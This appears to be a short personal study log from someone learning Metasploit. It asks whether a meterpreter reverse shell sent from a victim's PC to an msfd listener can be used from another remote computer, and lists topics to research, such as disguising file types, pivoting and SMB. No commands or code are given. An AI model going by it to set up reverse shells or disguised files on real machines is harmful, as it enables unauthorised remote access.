-Can you execute a payload on a victim's pc which sends a meterpreter shell back to the attacker; who has used the msfd utility to listen on a specified port; then connect from another remote computer to the attackers computer and work with the meterpreter shell that has been sent to the original attacker?

This is still being tested, the two main problems are:
1. I'm not even sure if its possible.
2. I can't get msfd to run in the background so that I can interact with the msfconsole again.

Updated list of questions/curiousities:

-Research Transmogrify to mask/unmask files as any file type.
-What is network pivoting?
-How to interface Metasploit with Nmap or Nessus?
-Learn more about ilog, which is a method of Information logging.
-What is Serve Message Block (SMB)?
-Explore the potential of the Metasploit Data bases.
-Can you execute a payload on a victim's pc which sends a meterpreter shell back to the attacker; who has used the msfd utility to listen on a specified port; then connect from another remote computer to the attackers computer and work with the meterpreter shell that has been sent to the original attacker?